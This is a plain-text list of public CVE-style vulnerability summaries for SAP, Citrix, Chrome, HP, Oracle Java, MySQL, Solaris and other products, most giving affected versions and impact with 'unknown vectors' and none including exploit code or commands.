Unspecified vulnerability in the configuration service in SAP J2EE Engine allows remote attackers to obtain credential information via unknown vectors.
Unspecified vulnerability in the SAP CCMS / Database Monitors for Oracle allows attackers to obtain the database password via unknown vectors.
Integer overflow in the png_set_unknown_chunks function in libpng/pngset.c in libpng before 1.5.14beta08 allows context-dependent attackers to cause a denial of service (segmentation fault and crash) via a crafted image, which triggers a heap-based buffer overflow.
Multiple unspecified vulnerabilities in Check Point Security Gateway 80 R71.x before R71.45 (730159141) and R75.20.x before R75.20.4 and 600 and 1100 appliances R75.20.x before R75.20.42 have unknown impact and attack vectors related to "important security fixes."
Unspecified vulnerability in core/settings.php in ownCloud before 4.0.12 and 4.5.x before 4.5.6 allows remote authenticated users to execute arbitrary PHP code via unknown vectors.  NOTE: this issue was SPLIT from CVE-2013-0303 due to different affected versions.
Cross-site request forgery (CSRF) vulnerability in Opsview before 4.4.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Multiple cross-site request forgery (CSRF) vulnerabilities in Fat Free CRM before 0.12.1 allow remote attackers to hijack the authentication of unspecified victims via unknown vectors, related to the lack of a protect_from_forgery line in app/controllers/application_controller.rb.
The XML parser (crm_flex_data) in SAP Customer Relationship Management (CRM) 7.02 EHP 2 has unknown impact and attack vectors related to an XML External Entity (XXE) issue.
The training-registration page in Cisco WebEx Training Center allows remote attackers to modify unspecified fields via unknown vectors, aka Bug ID CSCul35990.
Cross-site request forgery (CSRF) vulnerability in Citrix NetScaler Application Delivery Controller (ADC) 9.3.x before 9.3-64.4, 10.0 before 10.0-77.5, and 10.1 before 10.1-118.7 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in Citrix NetScaler Application Delivery Controller (ADC) 9.3.x before 9.3-64.4, 10.0 before 10.0-77.5, and 10.1 before 10.1-118.7 allows users to "breakout" of the shell via unknown vectors.
Unspecified vulnerability in Citrix NetScaler Application Delivery Controller (ADC) 9.3.x before 9.3-64.4, 10.0 before 10.0-77.5, and 10.1 before 10.1-118.7 allows attackers to cause a denial of service via unknown vectors, related to "RADIUS authentication."
Unspecified vulnerability in the Service VM in Citrix NetScaler SDX 9.3 before 9.3-64.4 and 10.0 before 10.0-77.5 and Application Delivery Controller (ADC) 9.3.x before 9.3-64.4, 10.0 before 10.0-77.5, and 10.1 before 10.1-118.7 allows attackers to cause a denial of service via unknown vectors, related to the "Virtual Machine Daemon."
Internet TRiLOGI Server (unknown versions) could allow a local user to bypass security and create a local user account.
Cross-site scripting (XSS) vulnerability in the Calendar module in Olat 7.8.0.1 (b20130821 N1) allows remote attackers to inject arbitrary web script or HTML via the Location field.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site request forgery (CSRF) vulnerability in Cisco WebEx Training Center allows remote attackers to hijack the authentication of unspecified victims via unknown vectors, aka Bug ID CSCul25567.
Multiple unspecified vulnerabilities in Google V8 before 3.24.35.10, as used in Google Chrome before 33.0.1750.146, allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 33.0.1750.146 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 33.0.1750.117 allow attackers to bypass the sandbox protection mechanism after obtaining renderer access, or have other impact, via unknown vectors.
The SVGAnimateElement::calculateAnimatedValue function in core/svg/SVGAnimateElement.cpp in Blink, as used in Google Chrome before 33.0.1750.117, does not properly handle unexpected data types, which allows remote attackers to cause a denial of service (incorrect cast) or possibly have unspecified other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 32.0.1700.76 on Windows and before 32.0.1700.77 on Mac OS X and Linux allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 31.0.1650.63 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in the ZCC page in Novell ZENworks Configuration Management (ZCM) before 11.2.4 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in the ZCC page in Novell ZENworks Configuration Management (ZCM) before 11.2.4 has unknown impact and attack vectors related to an "Application Exception."
The ZCC page in Novell ZENworks Configuration Management (ZCM) before 11.2.4 allows attackers to conduct cross-frame scripting attacks via unknown vectors.
Unspecified vulnerability in IBM Rational Service Tester 8.3.x and 8.5.x before 8.5.1 and Rational Performance Tester 8.3.x and 8.5.x before 8.5.1 allows remote attackers to read arbitrary files via unknown vectors.
Unspecified vulnerability on IBM Power 7 Systems 740 before 740.70 01Ax740_121, 760 before 760.40 Ax760_078, and 770 before 770.30 01Ax770_062 allows local users to gain Service Processor privileges via unknown vectors.
Unspecified vulnerability in the Apache Solr for TYPO3 (solr) extension before 2.8.3 for TYPO3 has unknown impact and remote attack vectors, related to "Insecure Unserialize."
Unspecified vulnerability in HP HP-UX Whitelisting (aka WLI) before A.01.02.02 on HP-UX B.11.31 allows local users to bypass intended access restrictions via unknown vectors.
Unspecified vulnerability in HP Network Node Manager i (NNMi) 9.0x, 9.1x, and 9.2x allows remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in HP Array Configuration Utility, Array Diagnostics Utility, ProLiant Array Diagnostics, and SmartSSD Wear Gauge Utility 9.40 and earlier allows local users to gain privileges via unknown vectors.
Unspecified vulnerability in the Integration Service in HP Universal Configuration Management Database 10.01 and 10.10 allows remote authenticated users to execute arbitrary code via unknown vectors, aka ZDI-CAN-1977.
Unspecified vulnerability in the Integration Service in HP Universal Configuration Management Database 9.05, 10.01, and 10.10 allows remote authenticated users to obtain sensitive information via unknown vectors, aka ZDI-CAN-2042.
Unspecified vulnerability in Virtual User Generator in HP LoadRunner before 11.52 Patch 1 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1833.
Unspecified vulnerability in HP Database and Middleware Automation 10.0, 10.01, 10.10, and 10.20 before 10.20.100 allows remote authenticated users to obtain sensitive information via unknown vectors.
Unspecified vulnerability in HP StoreOnce Virtual Storage Appliance (VSA) before 3.7.2, StoreOnce 26xx and 4210 iSCSI Backup System before 3.9.0, StoreOnce 4210 FC Backup System before 3.9.0, and StoreOnce 4xxx Backup System before 3.9.0 allows remote attackers to obtain sensitive information or cause a denial of service via unknown vectors.
Unspecified vulnerability in HP Unified Functional Testing before 12.0 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1932.
Unspecified vulnerability in rpc.lockd in the NFS subsystem in HP HP-UX B.11.11 and B.11.23 allows remote attackers to cause a denial of service via unknown vectors.
Unspecified vulnerability in HP Smart Update Manager 5.3.5 before build 70 on Linux allows local users to gain privileges via unknown vectors.
Unspecified vulnerability in the loadFileContents function in the SOAP implementation in HP SiteScope 10.1x, 11.1x, and 11.21 allows remote attackers to read arbitrary files or cause a denial of service via unknown vectors, aka ZDI-CAN-2084.
Unspecified vulnerability in HP Rapid Deployment Pack (RDP) and Insight Control Server Deployment allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via unknown vectors.
Unspecified vulnerability in HP Rapid Deployment Pack (RDP) and Insight Control Server Deployment allows local users to obtain sensitive information, modify data, or cause a denial of service via unknown vectors.
Unspecified vulnerability in HP Security Management System 3.3.0, 3.5.0 before patch 1, and 3.6.0 before patch 2 allows remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in m4 in HP HP-UX B.11.23 and B.11.31 allows local users to obtain sensitive information or modify data via unknown vectors.
Unspecified vulnerability in HP Service Manager WebTier and Windows Client 9.20 and 9.21 before 9.21.661 p8 allows remote authenticated users to execute arbitrary code via unknown vectors.
Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-2008.
Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1905.
Unspecified vulnerability on HP LaserJet M1522n and M2727; LaserJet Pro 100, 300, 400, CM1415fnw, CP1*, M121*, M1536dnf, and P1*; Color LaserJet CM* and CP*; and TopShot LaserJet Pro M275 printers allows remote attackers to cause a denial of service via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in HP Operations Orchestration before 9 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in the Archive Query Server in HP Application Information Optimizer (formerly HP Database Archiving) 6.2, 6.3, 6.4, and 7.0 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1666.
Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in op5 Monitor before 6.1.3 allows attackers to read arbitrary files via unknown vectors related to lack of authorization.
The bgp_attr_unknown function in bgp_attr.c in Quagga 0.99.21 does not properly initialize the total variable, which allows remote attackers to cause a denial of service (bgpd crash) via a crafted BGP update.
apt-listbugs before 0.1.10 creates temporary files insecurely, which allows attackers to have unspecified impact via unknown vectors.
The firmware on GateHouse; Harris BGAN RF-7800B-VU204 and BGAN RF-7800B-DU204; Hughes Network Systems 9201, 9450, and 9502; Inmarsat; Japan Radio JUE-250 and JUE-500; and Thuraya IP satellite terminals has hardcoded credentials, which makes it easier for attackers to obtain unspecified login access via unknown vectors.
Unspecified vulnerability in the Web manager implementation on D-Link Japan DES-3800 devices with firmware before R4.50B58 allows remote attackers to cause a denial of service (device hang) via unknown vectors, a different vulnerability than CVE-2013-5997.
Unspecified vulnerability in the SSH implementation on D-Link Japan DES-3800 devices with firmware before R4.50B58 allows remote authenticated users to cause a denial of service (device hang) via unknown vectors, a different vulnerability than CVE-2013-5998.
Unspecified vulnerability in NVIDIA graphics driver Release 331, 325, 319, 310, and 304 allows local users to bypass intended access restrictions for the GPU and gain privileges via unknown vectors.
Unspecified vulnerability in NVIDIA graphics driver Release 331, 325, 319, 310, and 304 has unknown impact and attack vectors, a different vulnerability than CVE-2013-5987.
Unspecified vulnerability in WebAdmin in Sophos UTM (aka Astaro Security Gateway) before 9.105 has unknown impact and attack vectors.
Unspecified vulnerability in Oracle Java SE 6u65 and 7u45, Java SE Embedded 7u45, and OpenJDK 7 allows remote attackers to affect integrity via unknown vectors related to Security.  NOTE: the previous information is from the January 2014 CPU. Oracle has not commented on third-party claims that CanonicalizerBase.java in the XML canonicalizer allows untrusted code to access mutable byte arrays.
Unspecified vulnerability in the PeopleSoft Enterprise HRMS component in Oracle PeopleSoft Products 9.1 and 9.2 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Org and Workforce Dev.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.72 and earlier, 5.5.34 and earlier, and 5.6.14 and earlier allows remote attackers to affect availability via unknown vectors related to Error Handling.
Unspecified vulnerability in Oracle Java SE 5.0u55, 6u65, and 7u45; JRockit R27.7.7 and R28.2.9; Java SE Embedded 7u45; and OpenJDK 7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.  NOTE: the previous information is from the January 2014 CPU. Oracle has not commented on third-party claims that the issue is due to incorrect input validation in LookupProcessor.cpp in the ICU Layout Engine, which allows attackers to cause a denial of service (crash) or possibly execute arbitrary code via a crafted font file.
Unspecified vulnerability in Oracle Java SE 5.0u55, 6u65, and 7u45 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Install, a different vulnerability than CVE-2013-5905.
Unspecified vulnerability in Oracle Java SE 5.0u55, 6u65, and 7u45 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Install, a different vulnerability than CVE-2013-5906.
Unspecified vulnerability in Oracle Java SE 7u45 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment.
Unspecified vulnerability in Oracle Java SE 6u65 and 7u45 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2013-5889, CVE-2014-0410, CVE-2014-0415, CVE-2014-0418, and CVE-2014-0424.
Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.2.0 and 11.1.2.1 allows remote attackers to affect confidentiality via unknown vectors related to Identity Console.
Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.0, and 11.1.2.1 allows remote attackers to affect integrity via unknown vectors related to End User Self Service.
Unspecified vulnerability in Oracle Java SE 6u65 and 7u45 allows remote attackers to affect confidentiality via unknown vectors related to Deployment.
Unspecified vulnerability in Oracle Java SE 6u65 and 7u45 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Deployment, a different vulnerability than CVE-2014-0375 and CVE-2014-0403.
Unspecified vulnerability in the Oracle Agile Product Lifecycle Management for Process component in Oracle Supply Chain Products Suite 6.0, 6.1, and 6.1.1 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Manage Data Cache.
Unspecified vulnerability in Oracle Java SE 7u45 and JavaFX 2.2.45 allows remote attackers to affect confidentiality via unknown vectors related to JavaFX.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
Unspecified vulnerability in Oracle Java SE 7u45 and Java SE Embedded 7u45, and OpenJDK 7, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries.  NOTE: the previous information is from the January 2014 CPU. Oracle has not commented on third-party claims that the issue is related to improper handling of methods in MethodHandles in HotSpot JVM, which allows attackers to escape the sandbox.
Unspecified vulnerability in the Oracle VM VirtualBox component in Oracle Virtualization VirtualBox prior to 3.2.20, 4.0.22, 4.1.30, 4.2.22, and 4.3.6 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Core.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.33 and earlier and 5.6.13 and earlier allows remote authenticated users to affect availability via unknown vectors related to Partition.
Unspecified vulnerability in the Oracle Payroll component in Oracle E-Business Suite 11.5.10.2, 12.0.6, 12.1.1, 12.1.2, 12.1.3, and 12.2.2 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Exception Reporting.
Unspecified vulnerability in Oracle Java SE 6u65 and 7u45 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2013-5902, CVE-2014-0410, CVE-2014-0415, CVE-2014-0418, and CVE-2014-0424.
Unspecified vulnerability in Oracle Java SE 6u65 and 7u45, when running with GNOME, allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Deployment.
Unspecified vulnerability in Oracle Java SE 6u65 and 7u45 allows remote attackers to affect availability via unknown vectors related to Deployment.
Unspecified vulnerability in the PeopleSoft Enterprise HRMS component in Oracle PeopleSoft Products 9.1 and 9.2 allows remote attackers to affect integrity via unknown vectors related to Common Application Objects.
Unspecified vulnerability in Oracle Solaris 11.1 allows local users to affect integrity via unknown vectors related to Audit.
Unspecified vulnerability in Oracle Solaris 8 allows local users to affect integrity and availability via unknown vectors related to Kernel.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote authenticated users to affect availability via unknown vectors related to Stored Procedures.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.14 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB, a different vulnerability than CVE-2014-0431.
Unspecified vulnerability in the Oracle Demantra Demand Management component in Oracle Supply Chain Products Suite 12.2.0, 12.2.1, and 12.2.2 allows remote attackers to affect confidentiality via unknown vectors related to DM Others.
Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.4.0 and 8.4.1 allows context-dependent attackers to affect availability via unknown vectors related to Outside In Maintenance.
Unspecified vulnerability in Oracle Java SE 6u65 and 7u45, Java SE Embedded 7u45, and OpenJDK 7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Security.  NOTE: the previous information is from the January 2014 CPU.  Oracle has not commented on third-party claims that the Security component does not properly handle null XML namespace (xmlns) attributes during XML document canonicalization, which allows attackers to escape the sandbox.
Unspecified vulnerability in the Oracle Demantra Demand Management component in Oracle Supply Chain Products Suite 7.2.0.3 SQL-Server, 7.3.0, 7.3.1, 12.2.0, and 12.2.1 allows remote attackers to affect confidentiality via unknown vectors related to DM Others.
Unspecified vulnerability in Oracle Solaris 10 and 11.1 allows local users to affect availability via unknown vectors related to Kernel, a different vulnerability than CVE-2014-0447.
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 11.5.10.2, 12.0.6, 12.1.3, and 12.2.2 allows local users to affect confidentiality via unknown vectors related to Logging.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.52 and 8.53 allows remote attackers to affect confidentiality via unknown vectors related to Integration Broker.
Unspecified vulnerability in the Oracle AutoVue Electro-Mechanical Professional component in Oracle Supply Chain Products Suite 20.1.1 allows remote authenticated users to affect confidentiality via unknown vectors related to Web General, a different vulnerability than CVE-2013-5868 and CVE-2014-0444.
Unspecified vulnerability in Oracle Java SE 7u45 and JavaFX 2.2.45 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to JavaFX.
Unspecified vulnerability in the Oracle WebCenter Portal component in Oracle Fusion Middleware 11.1.1.6.0, 11.1.1.7.0, and 11.1.1.8.0 allows remote attackers to affect confidentiality via unknown vectors related to Page Service.
Unspecified vulnerability in the Oracle AutoVue Electro-Mechanical Professional component in Oracle Supply Chain Products Suite 20.1.1 allows remote authenticated users to affect confidentiality via unknown vectors related to Web General, a different vulnerability than CVE-2013-5871 and CVE-2014-0444.
Unspecified vulnerability in Oracle Solaris 11.1 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Kernel.
Unspecified vulnerability in Oracle Solaris 11.1 allows local users to affect availability via unknown vectors related to Utility/User administration.
Unspecified vulnerability in the Instantis EnterpriseTrack component in Oracle Primavera Products Suite 8.0.6 and 8.5 allows remote attackers to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Core RDBMS component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, and 12.1.0.1 allows remote authenticated users to affect integrity via unknown vectors, a different vulnerability than CVE-2015-0370.
Unspecified vulnerability in the Oracle Health Sciences InForm component in Oracle Industry Applications 4.5 SP3, 4.5 SP3a-k, 4.6 SP0, 4.6 SP0a-c, 4.6 SP1, 4.6 SP1a-c, 4.6 SP2, 4.6 SP2a-c, 5.0 SP0, 5.0 SP0a, 5.0 SP1, and 5.0 SP1a-b allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Web.
Unspecified vulnerability in the Oracle Health Sciences InForm component in Oracle Industry Applications 4.5 SP3, 4.5 SP3a-k, 4.6 SP0, 4.6 SP0a-c, 4.6 SP1, 4.6 SP1a-c, 4.6 SP2, 4.6 SP2a-c, 5.0 SP0, 5.0 SP0a, 5.0 SP1, 5.0 SP1a-b, 5.5 SP0, 5.5 SP0b, 5.5.1, and 6.0.0 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Web.
Unspecified vulnerability in Oracle Java SE 7u40 and earlier and JavaFX 2.2.40 and earlier allows remote attackers to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Core RDBMS component in Oracle Database Server 11.1.0.7, 11.2.0.3, and 12.1.0.1 allows remote attackers to affect availability via unknown vectors.
Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2013-5787, CVE-2013-5789, CVE-2013-5824, and CVE-2013-5832.
Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries, a different vulnerability than CVE-2013-5842.
Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, and JavaFX 2.2.40 and earlier allows remote attackers to affect integrity via unknown vectors related to Deployment.
Unspecified vulnerability in the PeopleSoft Enterprise HRMS eCompensation component in Oracle PeopleSoft Products 9.1 and 9.2 allows remote authenticated users to affect confidentiality via unknown vectors related to eCompensation.
Unspecified vulnerability in Oracle Java SE 7u40 and earlier, and JavaFX 2.2.40 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to JavaFX.
Unspecified vulnerability in the Oracle iLearning component in Oracle iLearning 5.2.1 and 6.0 allows remote attackers to affect integrity via unknown vectors related to Learner Administration.
Unspecified vulnerability in Oracle Java SE 7u40 and earlier and JavaFX 2.2.40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to JavaFX.
Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, JavaFX 2.2.40 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.
Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries, a different vulnerability than CVE-2013-5850.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.51, 8.52, and 8.53 allows remote attackers to affect confidentiality via unknown vectors related to Portal, a different vulnerability than CVE-2013-5794.
Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality via unknown vectors related to Libraries.
Unspecified vulnerability in Oracle Solaris 10 allows remote attackers to affect integrity via unknown vectors related to Oracle Java Web Console.
Unspecified vulnerability in Oracle Java SE 7u25 and earlier, and Java SE Embedded 7u25 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries.
Unspecified vulnerability in the Oracle Health Sciences InForm component in Oracle Industry Applications 4.6 SP0, 4.6 SP0a-c, 4.6 SP1, 4.6 SP1a-c, 4.6 SP2, 4.6 SP2a-c, 5.0 SP0, 5.0 SP0a, 5.0 SP1, 5.0 SP1a-b, 5.0.3, and 5.0.4 allows remote authenticated users to affect confidentiality via unknown vectors related to Cognos.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.51, 8.52, and 8.53 allows remote attackers to affect confidentiality via unknown vectors related to Business Interlink.
Unspecified vulnerability in Oracle Solaris 8 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to ps.
Unspecified vulnerability in Oracle Solaris 8 and 9 allows local users to affect availability via unknown vectors related to Filesystem.
Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2013-5787, CVE-2013-5789, CVE-2013-5824, and CVE-2013-5852.
Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect integrity via unknown vectors related to Deployment, a different vulnerability than CVE-2013-5818 and CVE-2013-5819.
Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, JRockit R28.2.8 and earlier, JRockit R27.7.6 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries.
Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D, a different vulnerability than CVE-2013-5809.
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1; EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3; and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1; EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3; and EM Plugin for DB 12.1.0.2 allows remote attackers to affect integrity via unknown vectors related to Storage Management.
Unspecified vulnerability in the Oracle Transportation Management component in Oracle Supply Chain Products Suite 6.3 and 6.3.1 allows remote attackers to affect availability via unknown vectors related to Install / Installation.
Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2013-5787, CVE-2013-5789, CVE-2013-5832, and CVE-2013-5852.
Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, JRockit R28.2.8 and earlier, JRockit R27.7.6 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect availability via unknown vectors related to Security.
Unspecified vulnerability in the Oracle iLearning component in Oracle iLearning 5.2.1 and 6.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Learner Administration.
Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect integrity via unknown vectors related to Deployment, a different vulnerability than CVE-2013-5818 and CVE-2013-5831.
Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect integrity via unknown vectors related to Deployment, a different vulnerability than CVE-2013-5819 and CVE-2013-5831.
Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2 allows remote attackers to affect availability via unknown vectors related to Metro.
Unspecified vulnerability in the Oracle Identity Analytics component in Oracle Fusion Middleware Oracle Identity Analytics 11.1.1.5 and Sun Role Manager 4.1 and 5.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Security.
Unspecified vulnerability in the Oracle WebCenter Content component in Oracle Fusion Middleware 10.1.3.5.1, 11.1.1.6.0, 11.1.1.7.0, and 11.1.1.8.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Content Server.
Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality and availability via unknown vectors related to Deployment.
Unspecified vulnerability in the Oracle Health Sciences InForm component in Oracle Industry Applications 4.5 SP3, 4.5 SP3a-k, 4.6 SP0, 4.6 SP0a-c, 4.6 SP1, 4.6 SP1a-c, 4.6 SP2, 4.6 SP2a-c, 5.0 SP0, 5.0 SP0a, 5.0 SP1, and 5.0 SP1a-b allows remote authenticated users to affect confidentiality via unknown vectors related to Web.
Unspecified vulnerability in Oracle Java SE 7u40 and earlier and JavaFX 2.2.40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D, a different vulnerability than CVE-2013-5829.
Unspecified vulnerability in the Oracle iPlanet Web Proxy Server component in Oracle Fusion Middleware 4.0 allows remote attackers to affect confidentiality via unknown vectors related to Administration.
Unspecified vulnerability in Oracle MySQL Server 5.5.x through 5.5.32 and 5.6.x through 5.6.12 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Replication.
Unspecified vulnerability in Oracle Java SE 7u40 and earlier and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Swing, a different vulnerability than CVE-2013-5805.
Unspecified vulnerability in Oracle Java SE 7u40 and earlier and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Swing, a different vulnerability than CVE-2013-5806.
Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, JRockit R28.2.8 and earlier, and JRockit R27.7.6 and earlier allows remote attackers to affect confidentiality and integrity via unknown vectors related to Javadoc.
Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality via unknown vectors related to 2D.
Unspecified vulnerability in the Oracle Agile PLM Framework component in Oracle Supply Chain Products Suite 9.3.2 allows remote attackers to affect integrity via unknown vectors related to Security.
Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.2.0.0 and 11.1.2.1.0 allows remote attackers to affect integrity via unknown vectors related to End User Self Service.
Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, JRockit R28.2.8 and earlier, JRockit R27.7.6 and earlier, and JavaFX 2.2.40 and earlier allows remote authenticated users to affect integrity via unknown vectors related to Javadoc.
Unspecified vulnerability in the Siebel Core - EAI component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote attackers to affect availability via unknown vectors related to Web Services.
Unspecified vulnerability in the Oracle Demantra Demand Management component in Oracle Supply Chain Products Suite 7.2.0.3 SQL-Server, 7.3.0, 7.3.1, 12.2.1, 12.2.2, and 12.2.3 allows remote attackers to affect confidentiality via unknown vectors related to DM Others.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.51, 8.52, and 8.53 allows remote attackers to affect confidentiality via unknown vectors related to Portal, a different vulnerability than CVE-2013-5841.
